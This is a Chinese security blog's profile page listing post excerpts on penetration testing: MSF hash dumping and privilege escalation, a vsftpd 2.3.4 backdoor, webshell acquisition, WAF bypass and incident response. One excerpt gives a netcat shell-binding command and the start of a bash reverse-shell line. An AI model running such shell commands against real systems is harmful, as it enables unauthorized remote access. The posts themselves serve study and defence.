- 博客(26)
- 收藏
- 关注
RSS订阅原创 Linux常用命令
查看当前服务器的运行级别who -rrunlevel如何查看Linux默认网关route -nnetstat -nr查看cpulscpu查看内存大小free查看硬盘分区情况lsblk查看内核版本uname -alinux两种时钟:硬件时钟;系统时钟date---显示和设置系统时间clock,hwclock---显示硬件时钟cal---显示日历关机或重启halt---关机poweroff---关机reboot---重启..
2021-03-23 09:10:00
171
原创 常见的应急响应
常见的应急响应事件分类: web入侵---网页挂马,主页篡改,webshell系统入侵---病毒木马,勒索软件,远程后门网络攻击----DDOs攻击,DNS劫持,ARP欺骗一、Windows 入侵排查排查思路:1、 检查系统账户安全---弱口令,可疑账号,新增账号,隐藏账号,克隆账号 net user 查看可疑账户 lusrmgr.msc 检查管理员组是否有新增账号等 r...
2021-03-18 20:37:13
1222
原创 代码审计思路总结
实战思路: web安全重点就三个词——“输入”,“输出”,“数据流”。1、逆向追踪/回溯变量---检查敏感函数的参数,判断参数可控?是否有过滤?搜索响应的敏感关键字,定向挖掘,高效、高质量2、正向追踪/跟踪变量---找到哪些文件在接收外部传入的参数,跟踪变量的传递过程,观察是否有高危函数3、直接挖掘功能点漏洞---根据自身经验判断4、通读全文---index文件,了解程序架构...
2021-03-18 20:24:09
440
原创 获取目标主机HASH值的方法总结
PassingTheHashhash基础知识hash获取 a. 获取system权限下直接用hashdump命令:b. 利用后渗透模块的脚本:c. 利用smart_hashdump模块获取hash:绕过UAC提权直接获取hash值运行hash_dump模块获取hash:Hash破解和传递破解弱口令破解模块传递...
2021-03-18 19:52:30
668
原创 利用MSF抓包解包
数据包捕获:抓包: 获取shell 查看开放的网卡 使用网卡2开启监听(数据包存储在缓存中,最大50000) 将抓取的包下载下来 使用wireshark打开抓到的包解包: 模块使用 配置并利用即可看到抓取的数据包包记录: 打开脚本文件 使用模块可用参数...
2021-03-18 19:50:07
306
原创 利用MSF进行服务器信息收集
查看后渗透所有可以用的模块/跟Windows相关的 取证相关模块 列出目标机磁盘分析情况 检查目标机是否为虚拟机 列出目标机上面的服务 列出当前存在的应用 查看目标机的共享文件 列出目标机打过的补丁 获取hash值 列出操作系统的相关信息...
2021-03-18 19:46:35
120
原创 利用MSF进行windows 权限提升
前提:获取shell msf生成payload 设置监听 利用python开启http服务 win7上访问HTTP服务并执行msf.exe文件 查看监听的会话,出现meterpreter表示监听成功一、 提高程序运行级别 查看当前用户级别 尝试getsystem直接提权,失败...
2021-03-18 19:37:53
401
原创 Linux上安装docker容器并搭建vulhub靶场
一、docker容器的安装1. 安装docker安装条件:Linux已经配置好网络环境#更新软件列表 输入命令 apt-get update && apt-get upgrade#安装HTTPS协议,CA证书#安装docker#查看版本号#启动docker#显示docker详细信息2. 安装pip3. 安装docker-compose返回显示如图表示已成功安装二、vulhub漏洞靶场的搭建条件:li...
2021-03-01 18:21:32
1068
原创 Vsftpd2.3.4后门利用脚本编写
一、漏洞介绍 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。二、漏洞复现 Linux源代码安装Vsftpd2.3.4: wgethttp://xiazai.xiazaiba.com/Soft/V/vsftpd-2.3.4.tar.gz #下载安装包 tarzxvf...
2021-01-31 11:42:50
549
原创 python基础用法总结
一、python环境 注意:python2 、python3并不完全兼容 下载地址:https://www.python.org/downloads/windows/ windows推荐下载X86-64 executable installer ;Linux推荐下载Python-3.x.x.tgz的压缩包。 下载完成后添加环境变量 ...
2021-01-31 10:49:56
403
1
原创 linux提权与权限维持
一、Linux提权1. 内核提权 之脏牛漏洞提权 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条...
2021-01-24 22:26:16
376
原创 Win提权和权限维持
一、内核提权1. 常规思路 uname -a #查看内版本 searchsploit 版本号 #搜索漏洞利用代码直接 nc -lvvp 8080 -t -e /bin/bash #开启本地监听 nc目标IP端口 #直接连接目标主机 bash -i >&...
2021-01-24 21:49:41
226
原创 获取webshell的方法
一、管理员权限进后台 正常上传:网站对上传文件的后缀并未过滤,直接上传 数据库备份与恢复:网站对上传的文件后缀有过滤,但网站有数据库备份的功能,可以将WebShell格式先改为允许上传的文件格式,然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式。 数据库配置文件插码:往配置文件中写入木马 各种绕过姿势:00%截断;特殊后缀文件名绕过;文件名大小绕过 利用解析漏洞:利用低版本的中间件apache、ng...
2021-01-16 13:33:27
714
原创 web渗透常见漏洞总结
一、SQL注入1. 原理SQL:结构化查询语言所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击;如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。2. 不同数据库的注入 MySQL access...
2021-01-14 21:58:50
3398
1
原创 waf绕过方法总结
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件; WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
2020-12-30 20:26:44
2736
1
原创 2020十大安全漏洞介绍
OWASP(开放式web应用程序安全项目) Top 10 注入 失效的身份认证 1、定义 身份认证:身份认证最常用于系统登录,形式一般为用户名和密码登录方式,在安全性要求较高的情况下,还有验证码、客户端证书、Ukey等 会话管理:HTTP利用会话机制来实现身份认证,HTTP身份认证的结果往往是获得一个令牌并放在cookie中,之后的身份识别只需读授权令牌,而无需再次进行登录认证 2、原理 开发者通常会建立自定义的认证和会话管理方案。但与身份认证和回话管理相关.
2020-12-07 20:45:45
3890
原创 web渗透之信息收集
https://zhongce.360.cn/ 补天注册https://www.anquanke.com/src/ 安全应急响应中心https://www.shentoushi.top/ 渗透师导航http://ping.chinaz.com/ 多地点pingshodan 网络空间搜索引擎 domain=" "fofa ...
2020-12-07 19:41:15
128
原创 网络安全学习中的工具
1> Nmap Nmap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。 系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。 其基本功能有三个,一是探测一组主机是否在线;其次是扫描 主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。2> P0f p0f是一个纯粹的被动指纹识别工具,它在不干涉双方通信的情...
2020-12-06 20:20:51
2941
原创 MySQL基础知识
一、数据库操作 - 连接数据库:明文连接mysql -h127.0.0.1 -P3306 -uroot -proot -- 明文如果连接本地数据库 -h可以省略 如果服务器端口是3306,-P端口号也可以省略mysql -uroot -proot -- 明文密文连接mysql -uroot -p Enter password: **** -查询所有数据库:show batabases; -查询当前数据库: se...
2020-12-04 10:00:32
89
1
原创 PHP语言基本知识(2)
一、PHP文件操作1.文件读取 fopen(filename,mode) 打开文件 fclose(filename) 关闭文件 mode指读取文件模式,常用文件模式如下: r 只读模式,打开文件,从文件头开始读。 r+ 读写模式,打开文件,从文件头开始读写。 w 只写模式,打开文件,从文件头开始写,如果文件已存在,则覆盖文件原内容,如果文件不存在...
2020-12-02 22:35:14
111
原创 PHP语言基本知识
一、PHP简介 PHP是Hypertext Preprocessor的缩写,(超文本预处理器)是一种在服务器端运行的开源的脚本语言。二、PHP标记 ASP 风格 语法:<% ASP 代码 %>简短 风格 语法:<? PHP 代码 ?>脚本 风格 语法:<script language=”php”> PHP代码 </script>XML 风格(标准风格)语法:<?...
2020-12-01 21:46:00
224
原创 基于RPM包的yum在线管理
一、什么是yum? Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及CentOS中的Shell前端软件包管理器。 基于RPM包管理,能够从指定的服务器自动下载RPM包并且安装,可以自动处理依赖性关系,并且一次安装所有依赖的软件包,无须繁琐地一次次下载、安装。 二、网络yum源 [root@localhost yum.repos.d] # vi /etc/yum.repos...
2020-11-28 23:11:47
89
原创 Linux常用的基本命令
使用注意事项:Linux命令行界面分为分为普通用户和管理员用户两种,普通用户的提示符为 $ ,管理员用户的提示符是 # ;Linux所有的目录和文件名都是大小写敏感的;命令字、命令选项、命令参数之间都需要空格进行分隔;回车作为输入命令的结束,一旦回车,命令会立即送入Linux系统进行执行;tab键可以自动补全命令;上|下光标键可以在曾经使用的命令之间来回切换;退出当前选中命令的执行可以直接按ctrl+c。常用的帮助命令:help命令:Bash是Linux系统中默认使用的s
2020-11-26 23:00:21
59
原创 Linux常用的基础知识
一、 Linux是干嘛的? Linux一般用来做服务器端的操作系统。所有的网站、网络游戏等都需要服务器端,90%以上的服务器端都是用的Linux。Unix 和 Linux 的设计初衷就是多用户操作系统。二、 操作系统的分类:1. 桌面操作系统(给大众使用的):比如Windows、 MacOS、 Linux; 传统的Linux界面简单、操作复杂、应用软件少,一直被Windows压制;近年来随着Ubuntu、Federa等优秀桌面环境的兴起,同时各大硬件厂商对其支持加大...
2020-11-26 19:50:36
1363
原创 SQL常用语句
1. 查询当前数据库版本 : select version()2. 查询当前数据库用户 : select user()3. 查询当前路径 : select @@basedir4. 查询所有数据库 : show databases5. 选择一个数据库 : use + 数据库名6. 查询所有表名 : show tables7. 创建一个数据库 : create database 数据库名8. 删除一个数据库 : d...
2020-11-25 20:21:03
76
原创 五大服务器类型的配置
一、VPN服务器1. 在服务器管理器中【添加角色】—— 服务器角色选择【网络策略和访问服务】—— 角色服务选择【网络策略服务器】和【路由和远程访问控制】—— 然后下一步,点击【安装】,完成之后即可关闭;2. 退回到桌面开始菜单,选择【管理工具】—— 【路由与远程访问】—— 点击下一步,选择【自定义配置】—— 选择 【VPN访问】和【NAT】—— 然后点击下一步,完成安装向导;3. 进入路由与远程访问配置界面,点击服务器状态下的【IPv4】选项 —— 右击 【NAT】—— 【新增接口】—...
2020-11-21 21:13:05
705
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人